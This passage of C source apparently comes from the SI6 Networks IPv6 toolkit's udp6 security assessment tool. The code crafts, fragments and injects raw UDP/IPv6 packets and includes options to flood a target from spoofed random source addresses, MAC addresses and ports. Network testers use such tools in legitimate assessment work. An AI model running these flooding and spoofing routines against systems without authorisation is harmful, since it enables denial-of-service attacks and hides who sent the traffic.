if(data_f){ ptr= (unsigned char *)udp + sizeof(struct udp_hdr); if((ptr+ datalen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting UDP data"); exit(EXIT_FAILURE); } memcpy(ptr, data, datalen); ptr+= datalen; } udp->uh_ulen= htons(ptr - (unsigned char *) udp); udp->uh_sum = 0; udp->uh_sum = in_chksum(v6buffer, udp, ptr-((unsigned char *)udp), IPPROTO_UDP); frag_and_send(idata); return; } else{ if(ports >= nports){ sources++; ports= 0; } if(sources >= nsources){ if(loop_f){ sources= 0; } else{ donesending_f= 1; return; } } if( (ptr+sizeof(struct udp_hdr)) > (v6buffer + idata->max_packet_size)){ puts("Packet Too Large while inserting UDP header"); exit(EXIT_FAILURE); } udp= (struct udp_hdr *) ptr; memset(ptr, 0, sizeof(struct udp_hdr)); udp->uh_sport= htons(srcport); udp->uh_dport= htons(dstport); ptr += sizeof(struct udp_hdr); if(rhbytes_f){ if( (ptr + rhbytes) > v6buffer + idata->max_packet_size){ puts("Packet Too Large while inserting UDP datagram"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } while(rhbytes>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhbytes--; } } else if(data_f){ ptr= (unsigned char *)udp + sizeof(struct udp_hdr); if((ptr+ datalen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting UDP data"); exit(EXIT_FAILURE); } memcpy(ptr, data, datalen); ptr+= datalen; } udp->uh_ulen= htons(ptr - (unsigned char *) udp); if(pktdata == NULL && (floods_f && ports == 0)){ /* Randomizing the IPv6 Source address based on the prefix specified by "srcaddr" and srcpreflen. */ randomize_ipv6_addr( &(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); /* If we need to respond to incomming packets, we set the Interface ID such that we can detect which IPv6 addresses we have used. */ if(listen_f && useaddrkey_f){ ipv6->ip6_src.s6_addr32[2]= ntohl((uint32_t)random() <<16); ipv6->ip6_src.s6_addr32[2]= htonl(ntohl(ipv6->ip6_src.s6_addr32[2]) | ((ntohl(ipv6->ip6_src.s6_addr32[2])>>16) ^ addr_key)); ipv6->ip6_src.s6_addr32[3]= ntohl((uint32_t)random() <<16); ipv6->ip6_src.s6_addr32[3]= htonl(ntohl(ipv6->ip6_src.s6_addr32[3]) | (uint32_t)((ntohl(ipv6->ip6_src.s6_addr32[3]) >>16) ^ addr_key)); } if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK) && !(idata->hsrcaddr_f)){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); } } if(pktdata == NULL && floodp_f){ udp->uh_sport= random(); } udp->uh_sum = 0; udp->uh_sum = in_chksum(v6buffer, udp, ptr-((unsigned char *)udp), IPPROTO_UDP); frag_and_send(idata); if(pktdata == NULL) ports++; return; } } /* * Function: frag_and_send() * * Send an IPv6 datagram, and fragment if selected */ void frag_and_send(struct iface_data *idata){ if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + idata->linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ } /* * Function: usage() * * Prints the syntax of the udp6 tool */ void usage(void){ puts("usage: udp6 [-i INTERFACE] [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR] " "[-s SRC_ADDR[/LEN]] [-d DST_ADDR] [-A HOP_LIMIT] [-y FRAG_SIZE] [-u DST_OPT_HDR_SIZE] " "[-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] [-P PAYLOAD_SIZE] [-o SRC_PORT] " "[-a DST_PORT] " "[-N] [-f] [-j PREFIX[/LEN]] [-k PREFIX[/LEN]] [-J LINK_ADDR] [-K LINK_ADDR] " "[-b PREFIX[/LEN]] [-g PREFIX[/LEN]] [-B LINK_ADDR] [-G LINK_ADDR] " "[-F N_SOURCES] [-T N_PORTS] [-L | -l] [-z SECONDS] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the udp6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "udp6: Security assessment tool for attack vectors based on UDP/IPv6 packets\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --payload-size, -P UDP Payload Size\n" " --src-port, -o UDP Source Port\n" " --dst-port, -a UDP Destination Port\n" " --data, -Z UDP payload data\n" " --rate-limit, -r Rate limit the address scan to specified rate\n" " --probe-mode, -p UDP probe mode {dump,script}\n" " --block-src, -j Block IPv6 Source Address prefix\n" " --block-dst, -k Block IPv6 Destination Address prefix\n" " --block-link-src, -J Block Ethernet Source Address\n" " --block-link-dst, -K Block Ethernet Destination Address\n" " --accept-src, -b Accept IPv6 Source Addres prefix\n" " --accept-dst, -g Accept IPv6 Destination Address prefix\n" " --accept-link-src, -B Accept Ethernet Source Address\n" " --accept-link-dst, -G Accept Ethernet Destination Address\n" " --flood-sources, -F Flood from multiple IPv6 Source Addresses\n" " --flood-ports, -T Flood from multiple UDP Source Ports\n" " --listen, -L Listen to incoming packets\n" " --loop, -l Send periodic UDP segments\n" " --sleep, -z Pause between sending UDP segments\n" " --help, -h Print help for the udp6 tool\n" " --verbose, -v Be verbose\n" "\n" "Programmed by Fernando Gont for SI6 Networks \n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts(SI6_TOOLKIT); puts( "udp6: Security assessment tool for attack vectors based on UDP/IPv6 packets\n"); if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodp_f) printf("Flooding the target from %u different UDP ports\n", nports); if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)){ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else{ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!(idata->hsrcaddr_f))?" (randomized)":"")); } else puts("Ethernet Source Address: Automatically selected for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s\n", plinkaddr); } } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ if(idata->dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((idata->srcaddr_f != TRUE)?" (randomized)":"")); } } else{ printf("IPv6 Source Address: randomized, from the fc00:1::/%u prefix%s\n", idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); if(idata->dstaddr_f){ if(!floodp_f || (floodp_f && nports ==1)){ printf("Source Port: %u%s\t", srcport, (srcport_f?"":" (randomized)")); } else{ printf("Source Port: (randomized)\t"); } printf("Destination Port: %u%s\n", dstport, (dstport_f?"":" (randomized)")); } else{ printf("Source Port: Auto\tDestination Port: Auto\n"); } } /* * Function: is_valid_tcp_segment() * * Performs sanity checks on an incomming UDP/IPv6 segment */ int is_valid_udp_datagram(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct udp_hdr *pkt_udp; unsigned char *pkt_end; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_udp = (struct udp_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* XXX: We are assuming no extension headers on incoming packets -- this should be improved! */ /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_udp + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_udp + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a UDP header */ if( (pkt_end - (unsigned char *) pkt_udp) < sizeof(struct udp_hdr)){ return FALSE; } /* Discard the packet if it is not of the minimum size to contain a UDP header */ if( (pkt_end - (unsigned char *) pkt_udp) < ntohs(pkt_udp->uh_ulen)){ return FALSE; } /* Check that the UDP checksum is correct */ if(in_chksum(pkt_ipv6, pkt_udp, pkt_end-((unsigned char *)pkt_udp), IPPROTO_UDP) != 0){ return FALSE; } /* XXX: Should perform additional checks on the IPv6 header */ /* Sanity checks on the Source Address and the Destination Address */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src)) || IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_dst))){ return FALSE; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src)) || IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_dst))){ return FALSE; } return TRUE; } ipv6toolkit-2.0+ds.1/tools/udp6.h000066400000000000000000000004321254360455000166000ustar00rootroot00000000000000/* * Header file for the udp6 tool * */ /* Constants for debug mode */ #define PROBE_DUMP 1 #define PROBE_SCRIPT 2 /* Constants for UDP buffers */ #define UDP_BUFFER_SIZE 65535 #define UDP_INPUT_BUFFER_SIZE TCP_BUFFER_SIZE #define UDP_OUTPUT_BUFFER_SIZE TCP_BUFFER_SIZE